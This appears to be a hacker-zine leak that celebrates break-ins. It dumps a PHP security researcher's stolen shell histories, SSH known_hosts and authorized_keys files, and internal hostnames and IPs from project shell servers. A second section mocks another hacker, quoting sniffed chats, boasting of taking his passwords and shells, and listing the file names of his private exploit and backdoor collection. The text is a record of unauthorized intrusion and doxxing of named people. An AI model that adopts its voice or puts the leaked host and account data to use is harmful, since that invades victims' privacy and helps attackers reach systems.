cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
make
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
./php test.php
./php test.php > yyyy
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
make
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
./php test.php > yyyy
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
make
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
./php test.php > yyyy
php test.php > yyyy
./php test.php > yyyy
gdb ./php
./php test.php > yyyy
gdb ./php
./php test.php > yyyy
./php test.php > yyyy
gdb ./php
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\1



  
62\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
make
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
gdb ./php
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`"
gcc -c test.s
gcc -c test.s
objdump --disassemble test.o
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`"
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
gcc -c test.s
objdump --disassemble test.o
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
ls
cd php-4.3.9
make
mc
make clean
cd ..
make clean
ls
ls -la
libtool
./configure --disable-cgi --without-mysql
make
mc
make
mc
man strtok
make clean
cd ..
make distclean
mc
make
make test
ls
cd sapi/cli
ls
objdump --disassemble php
objdump --disassemble php zend_hash_destroy
ls -,la
ls -la
man objdump
objdump --disassemble php > php_dis
mc
cat test.php
gdb php
ls
cd ..
gdb php
ls -la
cd sapi
cd cli
ls
rm -rf test.php
rm -rf yyyy
cd ..
ls
cd ..
ls
rm -rf php-5.0.0RC3.hardened.alpha/
rm -rf php-5.0.0RC3.hardened.alpha/ &
ls
gcc -o x x.c -m64
cc -o x x.c -m64
exit
cd php-4.3.9
ls
make distclean
ls
./config.nice
lex
./configure --help | more
ls
./config.nice
mc
exit
ls
cd php-4.3.9
make distclean
ls
./config.nice
ls
exit
ls
cd php-4.3.9
./config.nice
mc
ls
cat config.log | more
ls
vi ./configure
./config.nice
vi ./configure
./config.nice
CFLAGS=-m64 ./config.nice
make
ls
mc
ls
cd sapi
ls
cd cli
objdump
objdump --disassemble php > php.dis
cat php.dis | less
objdump --disassemble-all php > php.dis
cat php.dis | less
ls
mcedit sparc.s
vi sparc.s
ls
cd php-4.3.9
ls
cd sapi
ls
cd cli
ls
cat php.dis | more
cat php.dis | less
cat php.dis | grep jump
cat php.dis | less
ls
cd .
cd ..
cd ..
ls
cd ..
ls
vi sparc.s
gcc -m64 -c sparc.s
vi sparc.s
gcc -m64 -c sparc.s
vi sparc.s
gcc -m64 -c sparc.s
vi sparc.s
ls -la
objdump --disassemble-all sparc.o
quit
vi sparc.s
gcc -m64 -c sparc.s
objdump --disassemble-all sparc.o
cd php-4.3.9/sapi/cli/
cat php.dis | less
ls
cd ..
ls
cd ..
ls
cd ..
ls
vi sparc.s
ls
gcc -m64 -c sparc.s
cat sparc.s
vi t.c
gcc -m64 -o t t.c sparc.o
vi t.c
vi t.c
vi main
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
vi t.c
vi t.c
gcc -m64 -o t t.c sparc.o
vi sparc.s
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
./t
gdb ./t
ps -ax
vi t.c
ls
ls -la
gdb --core=core
ls
vi sparc.s
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
./t
gdb --core=core
gdb ./t
exit
gdb ./t
ls
vi sparc.s
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
objdump --disassemble-all t | more
objdump --disassemble t | more
ls
vi sparc.s
./t
gdb --core=core
ls
vi sparc.s
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
./t
gdb --core=core
vi sparc.s
gcc -m64 -o t t.c sparc.o
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
./t
gdb --core=core
gcc -c sparc.s
vi sparc.s
gcc -c sparc.s
vi sparc.s
ls
vi t.c
gcc -m64 -o t t.c sparc.o
vi sparc.s
gcc -c sparc.s
gcc -c sparc.s -m64
gcc -m64 -o t t.c sparc.o
objdump --disassemble t | more
cd php-4.3.9/sapi/cli
cat php.dis |less
ls
cd ..
cd ..
ls
cd ..
ls
vi sparc.s
gcc -m64 -c sparc.s
vi sparc.s
gcc -m64 -c sparc.s
vi sparc.s
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
objdump --disassemble t | more
quit
exit
gcc -o p p.c
./p
vi p.c
gcc -o p p.c
./p
vi p.c
gcc -o p p.c
./p
vi p.c
exit
ls
exit
ls
gunzip hardened-php-4.3.10-0.2.4.patch.gz ; tar xfz php-4.3.10.tar.gz ; rm -rf php-4.3.9 ; rm -rf php-5.0.0RC3.hardened.alpha ; rm -rf php-4.3.9.tar.bz2 ; cd php-4.3.10 ; patch -p1 -i ../hardened-php-4.3.10-0.2.4.patch ; ( ./configure --disable-cgi --without-mysql && make && make test )
mc
cat main/php_config.h
cat main/php_config.h | grep ZTS
cat main/php_config.h | grep TSRM
cat TSRM/TSRM.h | grep FETCH
ls
exit
ls
uname -a
exit
ls
ls -la
cat /etc/compilefarm-hosts
nslookup shell
exit
ls
rm -rf hardened-php-4.3.10-0.2.4.patch
rm -rf php-4.3.10*
exit
ls
tar xfj php-4.4.0.tar.bz2
cd php-4.4.0/
patch -p 1 -i ../hardening-patch-4.4.0-0.4.3.patch
./configure && make
make distclean
exit
ls
cd php-4.4.0
./configure && make
php
make test
make distclean
exit
ls
cd php-4.4.0
./configure && make
make test
mc
exit
cat /etc/hosts
cat /etc/compilefarm-hosts
ssh amd64-linux1
ssh amd64-linux2
exit
exit
exit
ls
cd php-4.4.0
make distclean
ls
./configure
vi configure
export TERM=xterm
vi configure
vi configure
./configure
vi configure
./configure
vi configure
./configure
./configure
export
CFLAGS=-m64 ./configure
make
make test
exit
cd /usr/share
ls
cd /usr/local/lib
ls
cd /usr/share/doc
ls
cd php4
ls
ls -la
cd ..
cd /usr/share/doc/php4-pear
1~
uname -a
exit
ls
id
exit
ls
vi tmp.c
gcc -o tmp tmp.c
./tmp
ls -la /tmp
ls -la /tmp/php*
l
ls
cat tmp.c
exit
ls
ls -la
vi tmp.c
export TERM=xterm
vi tmp.c
gcc -o tmp2 tmp.c
./tmp2
./tmp2
vi tmp.c
./tmp2
ls
rm php*
ls
gcc -o tmp2 tmp.c
./tmp2
exit
ls
rm php*
gcc -o tmp3 tmp.c
./tmp3
ls -la
rm php*
ls
ls -la /lib
ls -la /usr/lib
ls -la
ldd
ldd tmp3
cp /usr/lib/libc.so.1 .
ls -la
ls
exit
ls -la
hostname
exit
exit
-bash-3.00$ ls -al .ssh
total 24
drwxr-xr-x 2 sesser users 4096 Oct 31 23:33 .
drwxr-xr-x 7 sesser users 4096 Dec 11 13:58 ..
-rw-r--r-- 1 sesser users 1014 Oct 31 23:33 authorized_keys
lrwxrwxrwx 1 root root 44 May 23 2005 authorized_keys2 -> /home/users/s/se/sesser/.ssh/authorized_keys
-rw------- 1 sesser users 540 Oct 31 23:33 identity
-rw-r--r-- 1 sesser users 344 Oct 31 23:33 identity.pub
-rw-r--r-- 1 sesser users 1018 Dec 13 2004 known_hosts
-bash-3.00$ cat .ssh/known_hosts
alpha-linux1 1024 35 142661610879350341359910471229015228681863557274361028972906159368885950729429412070243572601011727293022894294971710488750808642013768282973033828185834438788727862517061993275144181705534556506018164267399772317843039076165952732450937868591345271838554272083652072933542024190556532714720492745111209697383
usf-cf-x86-linux-2,10.8.2.2 1024 35 144347210870008624161092316389337570289598552640606869693267014907110107235922562213496296766734209062113687399129525025829085075420716051620275524781941123288825674755436976445952529574552166131811031107907538556791201407280635865514664841157997240734410466817367385487747269556022421062445416008666512662307
x86-solaris1,10.8.2.23 1024 35 156124405163858389525519490764713367294283674543074297742218100301019637545681376986056756809303328612489667335638024010684487740029490306968634357301793226486480843227248170731904405916788419418635783380129621755044919574758532483804625690298711307770284227997332399767093431422272090601633367092487363364191
-bash-3.00$ cat .ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuBF1ZxYmADf9Ugfa7JHN2KGNaV50CKhesGjHEra44IiTAIBoCgxPGbzldL3uorecobVqgavbEhrjjSztVEqLHGvnau4xI02AZgfGQ0hmeftLWCt0WrePeuU0HTRrtlIb2ZlTNjxsvFUnPaVeFfPHqWDRZv7SCTJRy4bJk92yVD0= ionic@cryptoland
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0YfKov2JrPWOLxsoFksbHfj4XavpDQTKAcwle7ME1HSbTDwTAknXwWiBsxKV/JSzfmx0NHqAjV8LQD47yCC5rxCF6spLo0WtuwUrI4MBkdhkihOoqhg3VmlbCpRWTwsrsAh90hAJ9g007COMJRod/6BDHoK9s9OLw2tgUCZ9+mE= sesser@sf
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwvlC0etEiKAAURisJs46W83kJEq0qX71ZDAlp8LQOa+ib3fBA7b33lNbkskdqDuu+anbIlLeSaQTxIa1kaxezkuksSFwK1cIo72dLaSDMw2/79q5ddPJB4sBQ60qGhb9zHQb7Q9KNA9HnyGYSMPog+pMrUL1R7a2MsohTRZM+hU= sesser@homebase
1024 35 143808617116634468337205489233272089485466682703555064206019641978897347333998435917695364538885745044943180415451840091912076126510412685627256983904948428717832714701391874570859361167980010259540104452327066697219794918919758471872243099024807933269046053582569275522091111562938360375588144850293713813871 sesser@cf.sourceforge.net
-bash-3.00$ exit

-~-~-~ l3tz try 4n0th3r b0x -~-~-~

[sesser@sc8-pr-shell1 sesser]$ ls -al
total 4084
drwxr-xr-x 7 sesser users 4096 Nov 23 2005 .
drwxr-xr-x 654 root root 12288 Jul 19 00:30 ..
-rw------- 1 sesser users 4949 Nov 27 2005 .bash_history
-rw-r--r-- 1 sesser users 24 Jan 23 2004 .bash_logout
-rw-r--r-- 1 sesser users 191 Jan 23 2004 .bash_profile
-rw-r--r-- 1 sesser users 124 Jan 23 2004 .bashrc
-rw-r--r-- 1 sesser users 5531 Jan 23 2004 .canna
-rw-r--r-- 1 sesser users 847 Jan 23 2004 .emacs
drwx------ 2 sesser users 4096 May 30 2005 .gnupg
drwxr-xr-x 14 sesser users 4096 Jul 11 2005 php-4.4.0
-rw-r--r-- 1 sesser users 4086074 Oct 18 2005 php-4.4.0.tar.bz2
drwxr-xr-x 3 sesser users 4096 Oct 18 2005 sesser@cf.sf.net
drwxr-xr-x 2 sesser users 4096 Jul 5 08:30 .ssh
-rw------- 1 sesser users 11220 Nov 23 2005 .viminfo
drwxr-xr-x 2 sesser users 4096 Jan 23 2004 .xemacs
-rw-r--r-- 1 sesser users 220 Jan 23 2004 .zshrc
-rw-r--r-- 1 sesser users 220 Jan 23 2004 .zshrc.rpmnew
[sesser@sc8-pr-shell1 sesser]$ cat .bash_history
ls
cd /home/groups/g/gc/gc-linux/htdocs/do
cd /home/groups/g/gc/gc-linux/htdocs/down/
ls
ls -la
cd /home/groups/g/gc/gc-linux/htdocs/down
ls
rm DOL.rar
ls -la
ls -la
cd /shares
cd /home/groups/b/ba/bastard
ls
ls -la
cd log
ls
cd ..
cd htdocs
ls
ls -la
cd apj
ls
cat index.html
cd ~
cd /home/groups/h/ha/hardened-php/
ls
cd htdocs
ls
vi index.php
vi index.php
cd /home/groups/h/ha/hardened-php/htdocs/
vi index.php
cd /home/groups/h/ha/hardened-php/htdocs/
vi index.php
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi index.php
nano index.php
nano index.php
nano index.php
cd /home/groups/h/ha/hardened-php
ls
cd htdocs
ls
vi index.php
vi top.php
ls
vi index.php
whois phpwned.com
exit
ls
cd /home/groups/h/ha/hardened-php/htdocs/
ls
vi download.php
vi news.php
vi news.php
vi news.php
vi download.php
cp exploits.php exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
cp documentation.php advisory-012004.php
vi advisory-012004.php
cp exploits2.php exploits.php
cd advisories
ls
cd ..
vi advisory-012004.php
cd /home/groups/h/ha/hardened-php
cd htdoc
cd htdocs
ls
vi exploits
vi exploits.php
vi exploits.php
cd /home/groups/h/ha/hardened-php/
cd htdocs/
vi exploits.php
vi exploits.php
vi exploits.php
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi download.php
vi features.php
vi news.php
vi index.php
cd /home/groups/h/ha/hardened-php/htcods
cd /home/groups/h/ha/hardened-php/htdocs
ls
cd
ls
ls -la
ls
cd .ssh
ls
cat authorized_keys2
cat authorized_keys
exit
cd /home/groups
cd h/ha/hardened-php/
ls
cd htdoc
l
scd htdocs/
cd htdocs/
ls
vi index.php
vi top.php
ls
vi index.php
whois phpwned.com
exit
ls
cd /home/groups/h/ha/hardened-php/htcods
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi news.php
vi news.php
vi download.php
ls
cd /home/groups/h/ha/hardened-php/htdocs
ls
cp news.php exploits.php
vi exploits.php
vi top.php
vi exploits.php
vi exploits.php
cd /home/groups/h/ha/hardened-php/htdocs/
ls
vi download.php
vi news.php
vi news.php
vi news.php
vi download.php
cp exploits.php exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
cp documentation.php advisory-012004.php
vi advisory-012004.php
cp exploits2.php exploits.php
cd advisories
ls
cd ..
vi advisory-012004.php
cd /home/groups/h/ha/hardened-php
cd htdoc
cd htdocs
ls
vi exploits
vi exploits.php
vi exploits.php
cd /home/groups/h/ha/hardened-php/
cd htdocs/
vi exploits.php
vi exploits.php
vi exploits.php
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi download.php
vi features.php
vi news.php
vi index.php
cd /home/groups/h/ha/hardened-php/htcods
cd /home/groups/h/ha/hardened-php/htdocs
ls
cp exploits.php exploits2.php
vi exploits2.php
vi exploits2.php
vi getfile.php
ls -la
cp punbb_change_email.732578.py exploit.1.xdfhuj
vi getfile.php
vi getfile.php
vi getfile.php
cat exploits2.php
vi exploits2.php
vi getfile.php
vi getfile.php
vi getfile.php
vi getfile.php
cd /home/groups/h/ha/hardened-php/htdocs/
dos2unix
dos2unic exploit.1.xdfhuj
dos2unix exploit.1.xdfhuj
ls -la *.py
ls -la ex*1*
chmod a+r exploit.1.xdfhuj
mv exploit.1.xdfhuj exploit.1.xdfhuj.1
vi getfile.php
exit
cd /home/groups/h/ha/hardened-php/htdocs
vi index.php
vi index.php
vi index.php
vi index.php
cd /home/groups/h/ha/hardened-php/htdocs/
vi index.php
vi index.php
vi index.php
vi index.php
vi /home/groups/h/ha/hardened-php/htdocs/top.php
cd /home/groups/h/ha/hardened-php/htdocs/
vi news.php
vi news.php
cd /home/groups/h/ha/hardened-php/htdocs/
vi download.php
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi hardened-php-signature-key.asc
ls
vi hard.txt
gpg
gpg --import-key hardened-php-signature-key.asc
gpg --import hardened-php-signature-key.asc
ls *.sig
gpg *.sig
gpg hardened-php-5.0.4-0.2.7.patch.gz.sig
gpg hardened-php-5.0.3-0.2.5.patch.gz.sig
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi advisory-012004.php
ls
cp advisory-012004.php advisory-012005.php
mv 012005.txt advisories/
vi advisory-012005.php
vi exploits.php
vi exploits.php
vi exploits.php
vi advisories/012005.txt
cd /home/groups/h/ha/hardened-php.net
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi news.php
exit
cd /home/groups/h/ha/Hardened-php/htdocs
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi top.php
vi top.php
vi index.php
vi index.php
vi top.php
ls -la *.php
cat index.php
vi preview.php
ls -la *.php
vi advisory-012004.php
vi advisory-012005.php
ls -la *.php
vi documentation.php
ls -la
ls -la *.php
vi documentation.php
ls
ls -la
ls -la *php
vi exploit.php
vi exploits.php
ls -la *.php
vi features.php
ls -la *.php
vi news.php
ls -la
ls -la *.php
vi news.php
ls -la
vi preview.php
vi download.php
cd /home/groups/h/ha/hardened-php/htdocs
vi top.php
vi news.php
cd /home/groups/h/ha/hardened-php/htdocs/
cp advisory-012005.php advisory-022005.php
vi advisory-022005.php
ls -la
cd /home/groups/h/ha/hardened-php/htdocs
ls
cp advisory-052005.php advisory-062005.php
vi advisor*06*php
ls
vi exploits.php
vi exploits.php
exit
cd /home/groups/h/ha/hardened-php/htdocs/
vi exploits.php
cd /home/groups/h/ha/hardened-php/htdocs
ls
cat punbb_change_email.732578.py
exit
ls
ls -la
exit
ls -la
rm php-4.4.0.tar.gz
tar xfj php-4.4.0.tar.bz2
scp -r php-4.4.0 sesser@cf.sf.net
scp -r php-4.4.0 sesser@cf.sf.net:.
scp -r php-4.4.0 sesser@cf.sourceforge
quit
exit
cd /home/groups/h/ha/hardened-php.net
cd /home/groups/h/ha/hardened-php
ls
cd htdocs
ls
vi error404.php
ls
mv index.php index.php.old
cp error404.php index.php
rm -rf ha*
ls -la
rm -rf advi*
rm ex*
y
ls -la
rm -rf archive.php
rm -rf gfx
rm -rf htdocs
rm -rf index.php.old
cat error404.php
cp error404.php ..
cp index.php ..
rm -rf *
cp ../index.php .
vi .htaccess
vi .htaccess
exit
[sesser@sc8-pr-shell1 hardened-php]$ cd /home/groups/x/xb/xbox-linux/
[sesser@sc8-pr-shell1 xbox-linux]$ ls -al
total 32
drwxrwsr-x 7 dummy xbox-linux 4096 Jun 1 02:42 .
drwxr-sr-x 116 root root 4096 Jul 17 14:35 ..
drwxr-sr-x 2 mist xbox-linux 4096 Jun 1 02:59 backup
drwxrwsr-x 2 dummy xbox-linux 4096 Sep 18 2005 cgi-bin
drwxrwxr-x 13 vema xbox-linux 4096 Apr 4 05:54 htdocs
-rw----rw- 1 vema users 181 Jul 26 2003 .htpasswd
drwxr-sr-x 5 paulproteus xbox-linux 4096 Dec 26 2004 moin
drwxr-sr-x 2 vema xbox-linux 4096 Oct 17 2004 php


g00d j0b s3cur1ty 3xp3rt. wh4t3v3r h4pp3nd t0 y0u h4ck1ng?


05.txt -~-~-~ tal0n g3tz h4x up!

well well well.. another episode of tal0n. the only cat cool enough to be in
every issue.

--------------------------------------------------------------------------------
Checklist:
[1] Find Proof Skew is Tal0n. :CHECK
[2] Get Into BHUGC/Darkminds Group and Steal Warez. :CHECK
[3] Get His Passwdz. :CHECK
[4] Get His Shellz. :CHECK
[5] Laugh For Dayz At This Dork. :CHECK
--------------------------------------------------------------------------------
so lets get this shit started.

[1] PROOF SKEW IS TAL0N

from sniff logs off of skew's box:

(01:50:11) omgseckz : tell me the truth.. are you really tal0n ?
(01:50:32) Skew --> http://skew.blackhat.ru: yep.. but dont ever address me as
my alter ego again plz

[2] GET INTO BHUGC // DARKMINDS AND STEAL WAREZ.

from txt file on skew's box:

skew'z explaination:
BlackHat UnderGround Community is a community of codes in the
blackhat community that contribute code on a server that is shared with the
other blackhats who have access to it. The community stays updated and more
alive when people upload more and more private exploits, tools, shellcodes, and
other non-public works of the community member.

Currently, we are just starting up and may have a server in a week
or so. If you are interested in joining the community, the requirement is when
the server is up and we are organized to upload ONE exploit written by yourself
and we encourage the uploads to atleast once a month although not required.


Ok, looks like no problem gettingin. (NOTE): the only thing skew has coded is
imap4life.pl and weve heard rumors someone else coded it.

~-~-~-~-~-~-~-~-~-~-~-~-~-~
skew@krack:~/darkminds$ ls
codes/
examples/
exploits/
papers/
research/
skew@krack:~/darkminds$ ls *
codes:
atomix-newlimit-1.0a.c
dfnctsc-kaiten.c
door.pl
nixfo-ng-1.6.tar.gz
scavenge-2.3.0b.zip
sh-mirk.tgz
sh2-power
shaft[priv].tar.gz
shaftmaster.c
sshbrute.c
stj.c

examples:
fmt/ heap/ stack/

exploits:
0x90_bsd.c*
THCREALbad.c*
gotfault-exim.tar.gz*
imap4life.pl*
m00-apache-priv8.tar.gz*
m00-smtpclame.c*
priv8Xone.c*
pwned3*
seXFree.c*
ttdb_exp.py*
557vnc.extra.c*
TTsharefile*
h4ckwebdav.tar.gz*
kcmshadow.c*
m00-deadbear.tar.gz*
m00seahouse-1.0.tar.gz*
priv8halflife.c*
qnx-phfont.c*
shoutdead.c*
unreal.c*
ES-PsyJack.tar.gz*
UHAGr-jidentd.tar.gz*
hackbsdcpanel.tar.gz*
krad2.c*
m00-deadbear2.tar.gz*
mayday.c*
priv8sambar.pl*
qnx-phgrafx.c*
shv5.tar.gz*
winwrk.tar.gz*
One-to-rule-them-all.c*
bmon2.c*
hackbsdkcms.tar.gz*
m00-0Wn-0x333.c*
m00-deadbear3.tar.gz*
openssl-too-open-priv8.tar.gz*
proftd_put_down2~m00.c*
real_magic.c*
subversion.c*
wuftpd.tar.gz*
THCIISSLame-linux.c*
cvs.c*
halflife2*
m00-SPAm.zip*
m00-samba-pwnd.tar.bz2*
priv8LEEEET.pl*
proftd_put_down2~m002.c*
remap_adv.c*
tr_tru.pl*
xfree.c*

papers:

research:
skew@krack:~/darkminds$ ls */*
codes/atomix-newlimit-1.0a.c
codes/sshbrute.c
exploits/UHAGr-jidentd.tar.gz*
exploits/kcmshadow.c*
exploits/m00-smtpclame.c*
exploits/proftd_put_down2~m002.c*
exploits/subversion.c*
codes/dfnctsc-kaiten.c
codes/stj.c
exploits/bmon2.c*
exploits/krad2.c*
exploits/m00seahouse-1.0.tar.gz*
exploits/pwned3*
exploits/tr_tru.pl*
codes/door.pl
exploits/0x90_bsd.c*
exploits/cvs.c*
exploits/m00-0Wn-0x333.c*
exploits/mayday.c*
exploits/qnx-phfont.c*
exploits/ttdb_exp.py*
codes/nixfo-ng-1.6.tar.gz
exploits/557vnc.extra.c*
exploits/gotfault-exim.tar.gz*
exploits/m00-SPAm.zip*
exploits/openssl-too-open-priv8.tar.gz*
exploits/qnx-phgrafx.c*
exploits/unreal.c*
codes/scavenge-2.3.0b.zip
exploits/ES-PsyJack.tar.gz*
exploits/h4ckwebdav.tar.gz*
exploits/m00-apache-priv8.tar.gz*
exploits/priv8LEEEET.pl*
exploits/real_magic.c*
exploits/winwrk.tar.gz*
codes/sh-mirk.tgz
exploits/One-to-rule-them-all.c*
exploits/hackbsdcpanel.tar.gz*
exploits/m00-deadbear.tar.gz*
exploits/priv8Xone.c*
exploits/remap_adv.c*
exploits/wuftpd.tar.gz*
codes/sh2-power
exploits/THCIISSLame-linux.c*
exploits/hackbsdkcms.tar.gz*
exploits/m00-deadbear2.tar.gz*
exploits/priv8halflife.c*
exploits/seXFree.c*
exploits/xfree.c*
codes/shaft[priv].tar.gz
